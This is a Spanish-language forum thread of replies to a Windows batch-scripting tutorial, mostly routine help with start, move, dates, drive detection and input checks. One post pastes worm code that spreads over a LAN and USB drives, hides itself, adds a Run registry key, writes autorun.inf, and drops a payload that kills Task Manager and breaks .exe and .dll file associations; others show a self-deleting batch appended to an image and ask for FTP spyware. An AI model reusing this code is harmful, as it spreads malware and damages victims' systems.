No creo que se entienda asi... si tengo un txt asi:

A
B
B
C

Y quiero comparar lineas, linea1==lineasiguiente... y que sea recursivo... y en batch...
(falta que quiera que tambien me sirva un café)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **sirdarckcat** en **25 Junio 2008, 01:26**

no puedes definir variables locales en batch.. tendrias que emularlas con prefijos, o algo similar.. por lo que per-se, la recursión no existe en batch

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Shinseiki86** en **25 Junio 2008, 19:29**

Hola! tengo otra preguntica... quiero abrir un xls desde el batch, pero este queda bloqueado hasta que cierre excel, ¿como hago para que continúe así este abierto el xls?

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Novlucker** en **25 Junio 2008, 19:51**

Supongo que para ejecutarlo estas poniendo....

Código:
`excel.exe`

En lugar de eso debes de poner.....

Código:
`start excel.exe`
;)

El code te quedará algo como esto

Código:

```
cd %programfiles%\microsoft office\officell  
start excel.exe
```

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Xen11 en 31 Julio 2008, 06:04

Hola que tal, quiero que el batch fije la fecha actual, la cambie por una X fija, abra un exe y luego la setee a la que fijo en primer orden, lo que me ocurre es que se setea a la "actual" luego de cerrar el programa, en que me equivoco, o que me falta?

Código:

```
FOR /F "tokens=1-4 delims=/ " %%a in ('date /t') do (set fecha=%%a-%%b-%%c)
```

```
date 29-07-2008
```

```
C:\vet\vet.exe
```

```
date %fecha%
```

Muchas gracias!

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Shinseiki86 en 13 Agosto 2008, 22:12

Hola a todos!

Como puedo hacer que se cree una unidad de red con bat?

Gracias.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: carlitos.dll en 13 Agosto 2008, 22:31

[Cita de: Shinseiki86 en 13 Agosto 2008, 22:12](#)

Hola a todos!

Como puedo hacer que se cree una unidad de red con bat?

Gracias.

con el comando net use

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Xen11** en **14 Agosto 2008, 16:28**

reitero la pregunta Hola que tal, quiero que el batch fije la fecha actual, la cambie por una X fija, abra un exe y luego la setee a la que fijo en primer orden, lo que me ocurre es que se setea a la "actual" luego de cerrar el programa, en que me equivoco, o que me falta?

Código:

```
FOR /F "tokens=1-4 delims=/ " %%a in ('date /t') do (set fecha=%%a-%%b-%%c)
```

```
date 29-07-2008
```

```
C:\vet\vet.exe
```

```
date %fecha%
```

Muchas gracias!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Novlucker** en **14 Agosto 2008, 16:56**

En que para ejecutar el programa deberías de utilizar **start**, si no lo haces el cmd queda a la espera de que se cierre el programa, y luego sigue, es como hacer **start /wait**

Código

1. FOR /F "tokens=1-4 delims=/ " %%a in ('date /t') do (set
fecha=%%a-%%b-%%c)
- 2.
3. date 29-07-2008
- 4.
5. start C:\vet\vet.exe
- 6.
7. date %fecha%

Saludos ;)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Shinseiki86** en **21 Agosto 2008, 02:45**

Buenas noches!

Necesito abrir un txt y buscar un dato especifico (aaaa-mm-dd) que se encuentra en la columna columna 505 hasta la 514 de la primera linea, y reemplazar este por otra fecha.

El nombre del archivo tiene esta estructura:

aaaa-mm-dd_numero_cc_numero_eps018_00_I.txt

Y necesito que modifique este archivo en la linea uno columna 505-514 con la fecha que se encuentra en el nombre.
Es posible con bat?

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **ACALFCROW** en **12 Septiembre 2008, 18:58**

hola que tal espero me puedan ayudar estoy creando un bat para un ejecutable el problema es que en cierto momento el ejecutable me pide que agregue otro nombre

de archivo o presione enter y ahi es donde no se como meter un enter en el bat he intentado dejar espacio en blanco un punto pero como espera el nombre de

un archivo o enter me lo toma como nombre de archivo alguien me puede ayudar

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **sib85** en **25 Septiembre 2008, 00:07**

Hola::

Tengo una duda un poco urgente, ¿Como puedo leer sólo la primera linea de un fichero txt?

lo que tengo que hacer es pasar un script de linux a windows y recrear la funcion

head -1 de shell script. Había pensado en un for, pero no se cómo poner el límite de 1 sola línea.

Muchas gracias de antemano :)

Nieves

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **augustocgg** en **29 Septiembre 2008, 04:48**

Hola

Me pueden ayudar de como hago para programar el siguiente bat

el bat me tiene que copiar archivos de una carpeta especificada, y solamente tienen que ser los archivos creados en el mes en curso de windows

la validacion seria solor por el mes en curso del sistema

Gracias a todos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **flony** en **7 Octubre 2008, 21:14**

hola quisiera mover unos archivos que tengo en una carpeta a otra y que pueda distinguir entre .doc y .txt si me dan una mano seria barbaro

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Novlucker** en **7 Octubre 2008, 21:32**

Hola, con el comando **move** alcanza, simplemente utilizas el comodín *

Código

1. move *.doc carpetadestino
2. move *.txt carpetadestino

Saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **chill@321** en **10 Octubre 2008, 22:21**

:huh: tengo duda como se programa para que se prenda la compu :huh:

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **sirdarckcat** en **17 Octubre 2008, 03:09**

jajaja, osea remotamente? o con un timeout? o como? depende que quieras hacer...

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **devil_boskonovitch** en **1 Noviembre 2008, 17:13**

Hola muchachos...!!!

Entro para ver si me podrian ayudar con unos codigos BAT...

Es que necesito un BAT que haga lo siguiente:

Que se propague por memorias USB, disco duros y particiones...!!!

Y que se pueda propagar en una RED LOCAL y que se autoejecute en las PC infectadas....

Hace ratito... encontré estos codigos de propagacion de red local, pero no me han funcionado:

Código:
@echo off
set/a ip=192.168.1.1
:mode
copy %0 > \\%ip%
start %0 at\\%ip%
set/a ip=ip+1
goto mode

Y este otro:

Código:
@echo off
set/a ip=192.168.1.1
:mode
copy %0 > \\%ip%
start %0 at\\%ip%

```

set/a ip=ip+1
if ip 192.168.1.255 goto salir else goto mode
:salir
exit

```

Me mandan error...

Y encuentre este para que se propague en USB:

Código:

```

@echo off
attrib +s +h %0
msg * hacked by =={ naxo itc }==
reg add hkln\software\microsoft\windows\currentversion\run /V Dump.exe /D
C:\Drivers\Dump.exe /f

```

```

:bluce
ping -n 10 127.0.0.1
IF exist C:\Drivers (goto 02) else (md C:\Drivers & attrib +h +s
C:\Drivers & goto 02)
:02
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers (goto a) else (md %%A:\Drivers & attrib +h +s
%%A:\Drivers & goto a) )

```

```

:a
IF exist C:\Drivers\Dump.exe (goto 05) else (goto 04)
:04
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -s -h %%A:\Drivers\Dump.exe & copy "%%A:\Drivers\Dump.exe"
"C:\Drivers\Dump.exe" & attrib +s +h %%A:\Drivers\Dump.exe)
attrib +h +s C:\Drivers\Dump.exe
:05
IF exist C:\autorun.inf (goto 07) else (goto 06)
:06
echo [AutoRun]>>C:\autorun.inf
echo label= naxo itc>>C:\autorun.inf
echo open=Drivers\Dump.exe>>C:\autorun.inf
echo shellexecute=Drivers\Dump.exe>>C:\autorun.inf
echo shell\Auto\command=Drivers\Dump.exe>>C:\autorun.inf
attrib +h +s C:\autorun.inf
:07
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" C:\autorun.inf') do
set co=%%B
if naxo== %co% (goto b) else (goto nar)
:nar
attrib -h -s C:\autorun.inf
del /f /q C:\autorun.inf
goto 06

```

```

:b
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers\Dump.exe (goto 0Cool else (attrib -s -h
C:\Drivers\Dump.exe & copy "C:\Drivers\Dump.exe" "%%A:\Drivers\Dump.exe"
& attrib +h +s %%A:\Drivers\Dump.exe & attrib +s +h C:\Drivers\Dump.exe &
goto 0Cool )

```

```

:08
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\autorun.inf (goto 09) else (attrib -h -s C:\autorun.inf &
copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf
& attrib +h +s C:\autorun.inf & goto bluce) )

:09
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" %%A:\autorun.inf') do
set co=%%B )
if naxo== %co% (goto bluce) else (goto her)
:her
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s %%A:\autorun.inf & del /f /q %%A:\autorun.inf )
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" &
attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce
)

```

En este.. la amenaza no se copia a la carpeta Drivers que crea el BAT...????? Aun cambiando el nombre de la amenaza por un BAT, no se aplica...???

El codigo que quiero propagar es este:

Código:

```

@echo off
taskkill /im taskmgr.exe
msg * BURLANDO TODAS LAS DEFENSAS DE TU EQUIPO
CD C:\Program Files\
assoc .exe=txtfile
assoc .dll=batfile
CD C:\Documents and Settings\All Users\Desktop
echo YO HE DESTRUIDO TODOS TUS PROGRAMAS > Hola.txt
exit

```

Cualquier ayuda se la agradecería....Mucho...!!!

Saludos...

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: patovica en 2 Noviembre 2008, 15:02

Cuales son las intrucciones para que detecte un pendrive. O sea, quiero que pregunte si el pendrive esta conectado o no, no importa lo que sigue, yo lo que quiero saber es cual es la instruccion para detectar el pendrive.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Darioxhcx** en **2 Noviembre 2008, 18:50**

[Cita de: patovica en 2 Noviembre 2008, 15:02](#)

Cuales son las intrucciones para que detecte un pendrive. O sea, quiero que pregunte si el pendrive esta conectado o no, no importa lo que sigue, yo lo que quiero saber es cual es la instruccion para detectar el pendrive.

if exist E:\
algo asi ?
saludos

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **2 Noviembre 2008, 18:54**

Mira este codigo detecta las unidades removibles (para sistemas en español) :

Código:

```
@echo off
for /f "tokens=3" %%x in ('echo list volume ^| diskpart ^| find /i
"Extra"') do (echo %%x:)
pause>nul
```

Comandos que podrian servirte :

Código:

```
wmic logicaldisk get caption
```

Código:

```
fsutil fsinfo drives
```

Código:

```
echo list volume | diskpart
```

Ahora prueba este codigo aver si te sirve :

Código:

```
@echo off
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra"
)
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra"
)
pause>nul
```

Código:

```
@echo off
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x
)
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x
)
pause>nul
exit /b
```

Saludos.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **uroboros** en **2 Noviembre 2008, 23:54**

El tema de variables ningun problema; pero lo de argumentos no lo cojo por ningun lado; es en eso de %0, el astring, %~f1, eso del directorio donde se tiene el archivo y como luego se muestran los analisis

es más, el concepto en general es lo que no comprendo. por ejemplo en este codigo

@echo off

echo Con Comillas: %1

echo Sin Comillas: %~1

el %1 a q se refiere?

o que es eso re recibir?

"Si lo que recibimos no es un archivo, sino una cadena de texto, que contiene mas de una palabra, se debe poner entre comillas, algo asi:"

si se me aclara el concepto, la idea general de los argumentos y de la semantica de sus codigos no tendré ningun problema, solo que el problema lo tengo al principio de todo y entonces ya no me funciona nada.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **patovica** en **3 Noviembre 2008, 22:41**

LEO G. muchas gracias por la respuesta, los probe y andan perfectos, los tendia que pulir un poquito para que detecte solamene el pendrive, ahora otra pregunta mas, la ideas es arragar este programa cuando se inicie window y quede latente hasta que alguien meta un pendrive y cuando sea asi me avise mediante una alerta, esta parte ya me anda, me falta como poder hacer para que quede stand by. Muchas gracias.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **4 Noviembre 2008, 05:08**

Hola, con respecto a lo de Stand by, puedes hacer un bucle que cada determinado tiempo, muestre las unidades extraibles conectadas, algo asi :

Código:

```
@echo off
:Code
ping -n 20 127.0.0.1>nul
...Codigo
goto:Code
```

Ahora, hice este otro Script, muestra las USB'S, es parecido a los demás, solo que ahora muestra la lista asi :

A:

B:

C:

etc.

Código:

```
@echo off
:Code
nircmd wait 3000
for /f "tokens=2 skip=1" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra" > nul 2>&1 && (
for /f "tokens=1" %%c in ('echo %%x') do (
echo %%c
)
)
)
for /f "tokens=1 skip=2" %%x in ('fsutil fsinfo drives ^| more') do (
fsutil fsinfo drivetype %%x | find /i "extra" > nul 2>&1 && (
for /f "tokens=1" %%c in ('echo %%x') do (
echo %%c
)
)
)
nircmd wait 1000
cls
goto:Code
```

El codigo usa a nircmd.exe, descargalo de nirsoft.net (<http://nirsoft.net>).

Saludos.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Leo Gutiérrez.** en **4 Noviembre 2008, 05:18**

Hola, de esta otra forma tambien se puede ;D :

Código:

```
@echo off
for /f "tokens=3" %%x in ('echo list volume ^| diskpart ^| find /i
"extra"') do (
echo %%x:
)
>nul (pause)
exit /b
```

Saludos.

Con WMIC tambien se pude, pero tengo problemas con el ahorita.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 4 Noviembre 2008, 05:23

Hola, tal ves te interese este, loo hice para que detecte las unidades extraibles y su espacio :

Código:

```
@echo off
for /f "tokens=3,6,7" %%a in ('echo list volume ^| diskpart ^| find /i
"extra"') do (
echo %%a:          %%b : %%c
)
>nul (pause)
exit /b
```

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: patovica en 7 Noviembre 2008, 03:19

Estimado LEO Gtz., de los programas que me mandastes, andan, pero lo que no me puedo dar cuenta es como puedo trabajar con las unidades, ya que si bien las ve, el programa solo se limita a hacer un loop y mostrar lo que encuentra pero no se como puedo preguntar por una especifica, por ejemplo yo quiero que me avise si alguien puso un pendrive en mi maquina en mi caso la letra es H:, Y otro tema que tambien quiero ver y no encuentro nada para leer, es que cuando se ejecute el archivo bat. no muestre la ventana de DOS, o sea que quede corriendo como en segundo plano.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 8 Noviembre 2008, 05:15

El codigo de abajo, constantemente esta buscando la unidad F:\, si la encuentra lanza el mensaje, si no, continua buscando.

Código

```
1. @echo off
2. :Bucle
3. set buscar=F:\
4. echo Buscando.
5. fsutil fsinfo drives | more | find /i "%buscar%" && (
6. echo:
7. echo Unidad %buscar% encontrada.
8. pause>nul
9. goto:eof
10. ) || (
11. cls
12. goto:Bucle
13. )
14.
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Meta** en **23 Diciembre 2008, 11:59**

Hola:

Muy currado el tutorial. He hecho una prueba con el bat.

Código:

```
ECHO @OFF
ECHO ^<head^>^<title^>Prueba del BAT^</title^>^</head^>^<body^>Esto es
una prueba^<p^>^<ahref="directorio/prueba2.html"^^>Enlace
2^</a^>^</p^>^</body^>^</html^> > prueba.html
MKDIR directorio
CD directorio
ECHO ^<head^>^<title^>PRUEBA
2^</title^>^</head^>^<p^>^<ahref="../prueba.html"^^>VOLVER^</a^>^</p^>^<bo
dy^>Esto es una prueba del html dentro de la carpeta
directorio.^</body^>^</html^> > prueba2.html
```

Como podrías comprobar funciona. Pero quiero hacer otra cosa que no se si se puede hacer o al menos vamos a intentarlo. Lo que quiero hacer un logo o una imagen cualquiera tamaño de nuestro avatar de este foro y copiar su código en el bat. Me imagino que se podrá obtener con un hexadecimal. Probamos este mismo que tiene fama www.winhex.com

Ahora me dirás si se puede hacer.

Un cordial saludo.

EDITO:

PD: *Aquí hay algo que deberías incluir en tu tutorial.*

<http://www.cristalab.com/tips/49576/programacion-avanzada-de-archivos-en-lotes-.bat.html>

<http://www.cristalab.com/tips/48410/programacion-batch-con-archivos-.bat.html>

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Leo Gutiérrez.** en **23 Diciembre 2008, 18:47**

Algo como esto:

Código:

```
@echo off
mode con cols=100
lines=100

echo                                     !!!i1/))$$$$$$)))/ii!

echo                                     !i1)$$$$$$$$$$$$$$$$$$$$$$)11i!

echo                                     i)$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$11!

echo                                     i)$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$)!

echo                                     i$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/iii!
echo                                     )$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$))ii))1
echo                                     !!$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
1 1/!!!)
echo                                     )$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
!11i/ii!)$))
echo                                     ))$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
i//i!))!$$$i
echo                                     )$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$) )$
$!!ii!)$$$$)
echo 1$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$i i
)$)$)$$$)$ii
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$!)$$$$$$$$$
$/ii11/)$$$
echo ii$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$1
11$$$$$$$$$$$$$$$$$$$!!
echo
$$$$$$$$$$$i! !)$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$) !$$$$$$$$$$$
$$$)!
echo !$$$$$$$$$) //$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$)$$$$$$$$$!
11$$$$$$$$$$$1
echo
)$$$$)$ii $$$i !!$$$ $$$$i $$$//
```

```

echo $$$)
!!ii          )$$$!  !!$)$          i$$$1  1$$!!

echo
$$$$!i$$$$))          )$$$!  !!$$11          !$$$/  !$$ii

echo /$$$ )))
/$$$!          1$$$!  !!$$ii          11$$  /$$$
echo
i$$$i!$$!1$$$i          1$$$!  !!$!!          !!$$  !$$$

echo
$$$$!  $$$$1          !)11          ))          ))  111

echo ii$$$$$$$$$i
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
echo  !i//))11  TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
TTTTTTTTTTT
echo.

echo          !)))))T          T)))))!          TT
TTTTTTTTTTT
echo  !66ddddddd))          )ddddddd6!!          TTdd
ddddddddddd!!
echo  )ddd!          (ddd          dd((          Tddd)          TTdd
!
echo  (d66          TdddT          !!          !!          !ddTT          6dd6          TTdd
!
echo  (ddd!          !!dd          !!dd!          !dd((          TTdd
!
echo  !ddd(TT          !!dd          !!dd!          6ddd6)!!          TTdd
!
echo          ) (ddddddd(          !!dd          !!dd!          TT(6dddd66!          TTdd
dddddddddd(
echo          !) ddddT          !!dd          !!dd!          !!T6ddd6          TTdd
!
echo  TT          ddd(          !!dd          !!dd!          TT!          ) ddd!          TTdd
!
echo  !ddTT          66d6          !!dd          !!dd!          (d6          Tddd!          TTdd
!
echo  ) ddd6T!!!T6ddd!          dd(          !66dd!          dddd)!          !) ddd(          TTdd
( )))))))!!
echo  ) dddddddddddT          ) ddddd( (dd!          ! ddddddddd66          TTdd
ddddddddddTT
echo          !! (6ddd6)!!          T6666T  ))          )) 66dd6(T          !))
)))))!!
pause>nul
exit /b 0

```

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Meta en 23 Diciembre 2008, 20:42

No me refería eso, pero ahora que lo veo, me encanta. Buen dibujo, ;)

Me refiero que cojas una imagen cualquiera. Por ejemplo imagen.jpg.

(http://multanilinuxmall.net/images/744px-OpenSUSE_Logo.svg.png)

Con ella guardar la foto tal como se ve aquí. que al ejecutar el bat, aparezca lo que se ve.

¿Eso es posible?

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **./Phr0zer** en **23 Diciembre 2008, 21:00**

si, es posible un ejemplo seria este ->

Código

```
1. copy /b pepe.jpg + 01.bat resultado.bat
```

y en el 01.bat debe ir un code como este

Código

```
1. CLS
2.      @ECHO OFF
3. msg * "creando la imagen"      ;Si quieren pueden suprimir esta
   linea
4. COPY %0 pepe.jpg
5. start pepe.jpg
6. ERASE %0
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **_carlos_** en **23 Diciembre 2008, 21:27**

podrías usar bhb 2.0

<http://sites.google.com/site/cmdbatch/bhb-2-0>

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **Meta** en **24 Diciembre 2008, 00:42**

[Cita de: carlos en 23 Diciembre 2008, 21:27](#)

podrías usar bhb 2.0

<http://sites.google.com/site/cmdbatch/bhb-2-0>

Muchas gracias a todos/as, voy a investigar.

PD: *Si sabe algo más, no duden en poderlo aquí.*

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Diego_Kappo en 23 Febrero 2009, 20:53

Necesito lo siguiente y no acierto a dar en la tecla. Tengo unos script en sql server que crean backups por fecha o sea un archivo con nombre de ejemplo "backup_23_02_2009.bak" . Lo que necesito es generar un bat que obtenga la fecha del sistema y la asigne a una variable. Luego necesito extraer tambien del nombre del archivo la subcadena "23_02_2009", asignarla a una variable para poder compararlas. Si la fechas son iguales copiar el archivo en cuestion a una carpeta determinada. se puede hacer con bat o tengo que hacerlo en VB6?

Atte
Diego

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Leo Gutiérrez. en 24 Febrero 2009, 04:54

[Cita de: Diego Kappo en 23 Febrero 2009, 20:53](#)

Necesito lo siguiente y no acierto a dar en la tecla. Tengo unos script en sql server que crean backups por fecha o sea un archivo con nombre de ejemplo "backup_23_02_2009.bak" . Lo que necesito es generar un bat que obtenga la fecha del sistema y la asigne a una variable. Luego necesito extraer tambien del nombre del archivo la subcadena "23_02_2009", asignarla a una variable para poder compararlas. Si la fechas son iguales copiar el archivo en cuestion a una carpeta determinada. se puede hacer con bat o tengo que hacerlo en VB6?

Atte
Diego
Código

- 1.
2. `@echo off`
3. `set "archivo=backup_23_02_2009.bak"`

```
4. echo.Fecha del sistema : %date:/= %
5. echo.Archivo %archivo%
6. set "subcadena=%archivo:~-14%"
7. set "subcadena=%subcadena:_= %"
8. set "subcadena=%subcadena:~0,-4%"
9. echo.Subcadena : %subcadena%
10. if ["%subcadena%"]==["%date:/= %"] (
11. echo.Son iguales.
12. rem Código para copia
13. ) else (
14. echo.No son iguales
15. rem Acción contraria.
16. )
17. set /p "=Presiona una tecla para salir del programa"
18. exit /b 0
```

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **alegrecentro** en **2 Marzo 2009, 23:18**

Una maravilla de tutorial.

Un saludo

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **huww** en **19 Marzo 2009, 17:16**

Soy nuevo y hasta ahora es lo mejor que he visto en el foro, muy buen tuto muy currado enhorabuena ;-) ;-)

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **.;.** en **19 Marzo 2009, 17:29**

Muy buen tutorial.

Gracias por postear esto.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **...:Breakk_::...** en **27 Mayo 2009, 01:16**

gracias por el tuto

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **Raquelcita** en **15 Julio 2009, 17:44**

Hola a todos. Soy nueva en este mundillo. A ver si alguien me ayuda...
Quiero parar la cola de impresión, con un net stop spooler, pero de una máquina que está en red. ¿Cómo he decírselo?
Muchas gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **Stati98** en **22 Julio 2009, 18:23**

Gracias, siempre algo sirve, puedo saber un poquito de cada cosa, y esto me sirve muchísimo para aprender otro poquito más.-

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **dapark** en **24 Agosto 2009, 00:17**

esta muy bueno tu manual, muchas gracias, pero tengo una inquietud, e buscado la manera para poder validar q solo acepte numeros enteros, q no acepte ningun otro caracter.... pero se me dificulta porq soy algo nuevo en la programacion, nose si podrian ayudarme....

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: **Leo Gutiérrez.** en **27 Agosto 2009, 04:46**

Prueba algo como:

Código:

```
:isNumber
set /p "number=Number: "
if not defined number goto :isNumber
set "variable=false"
for /f "delims=abcdefghijklmnopqrstuvwxyz" %%a in ("%number%") do set
"variable=true"
if "%variable%"=="true" (
echo Bien
pause>nul
exit /b 0
) else (
echo Mal.
goto :isNumber
)
```

No filtra todo.

Idea provista por MATT.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: dapark en 27 Agosto 2009, 06:00

[Cita de: Leo Gutierrez. en 27 Agosto 2009, 04:46](#)

Prueba algo como:

Código:

```
:isNumber
set /p "number=Number: "
if not defined number goto :isNumber
set "variable=false"
for /f "delims=abcdefghijklmnopqrstuvwxyz" %%a in ("%number%") do set
"variable=true"
if "%variable%"=="true" (
echo Bien
pause>nul
exit /b 0
) else (
echo Mal.
goto :isNumber
)
```

No filtra todo.

Idea provista por MATT.

Leo Muchisima gracias este me a servido, con anterioridad habia realizado este:

Código:

```
@echo off
Title validacion de numeros
color A
set /a valor=%1

if not %errorlevel% == 0 goto endif

if not %valor%==0 goto else
cls
echo Solo debe de ingresar numeros

goto endif

:else
cls
echo Valores aceptables

:endif
```

pero no logre adaptarlo a los batch que he estado realizando... el q tu me distes lo acople en un minuto a los programas muchas gracias

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **mDrinky** en **30 Diciembre 2009, 23:13**

Esta muy bien el tuto.

salu2!

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **dmx-anonimo** en **31 Diciembre 2009, 17:42**

disculpen tengo una duda se programar en batch l y todo eso pero no entiendo de que forma puedo hacer un espia en batch que se mande por internet usando solo un ftp

en modo pasivo se puede crear obras de arte con batch osea programas espias

buenos yo he hecho un par pero cuando lo mando no me llega nada y pruebo el batch en mi pc y anda y usando un server ftp de mi pc no uno pago pero quisiera ver algun codigo posteados de algun batch potente en modo espia yo tengo un par de ideas

pero me falta hacer que funque el envio solo me falla eso.....saludos ;D

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**

Publicado por: **dario2k8** en **5 Abril 2010, 09:08**

iMuy Buen tutorial!

Aprovecho para abusar de la amabilidad de los expertos.

Tengo la siguiente duda, cuando defino un set var=(ruta y archivo) ejemplo:

```
set var=c:\ventas\emp.dat
```

```
if exist %var% (goto dale) else goto falta
```

"esta sentencia acepta la ruta completa, por que no me resulta".

¿mi código está mal?

Citar

```
@echo off
```

```
cls
```

```
if exist c:\ventas\emp.dat (goto dale) else goto falta
```



```
:dale
cd\ventas
start /low /wait sispv.exe
goto FIN
:falta
cd\ventas
copy c:\ventas\emp c:\ventas\emp.dat
start /low /wait sispv.exe
goto fin
:fin
exit
```

Gracias, por la posible ayuda.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 5 Abril 2010, 16:17

Las rutas siempre trabajalas con dobles comillas.

Código:

```
set "var=c:\ventas\emp.dat"
if exist "%var%" (goto dale) else goto falta
```

Tú código no lo veo mal, mira, déjalo así:

Código:

```
@echo off
cls
if exist "c:\ventas\emp.dat" (goto:dale) else (goto:falta)
:dale
cd \ventas
start /low /wait sispv.exe
goto FIN
:falta
cd \ventas
copy "c:\ventas\emp" "c:\ventas\emp.dat"
start /low /wait sispv.exe
:fin
exit
```

¿Te da un error en pantalla?

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: dario2k8 en 14 Abril 2010, 06:57

;-) Gracias Leo, por contestar mi consulta.... voy a probar ese código.
;-)

¿Te da un error en pantalla? :rolleyes:
Te comento si me sale alguno.

Título: **Re: -> Programación BATCH Avanzada. (nuevo)**
Publicado por: **Hanzo_lx** en **29 Abril 2010, 21:00**

Hola a todos, despues de encontrar este genial manual me gustaria a ver si vosotros veis el fallo porque me estoy volviendome loco

estaba haciendome un bat para renombrar unos archivos segun mis necesidades y me queda algo asi:

Código:

```
@echo off

echo          =====
echo          =
echo          =
echo          =          Renamer
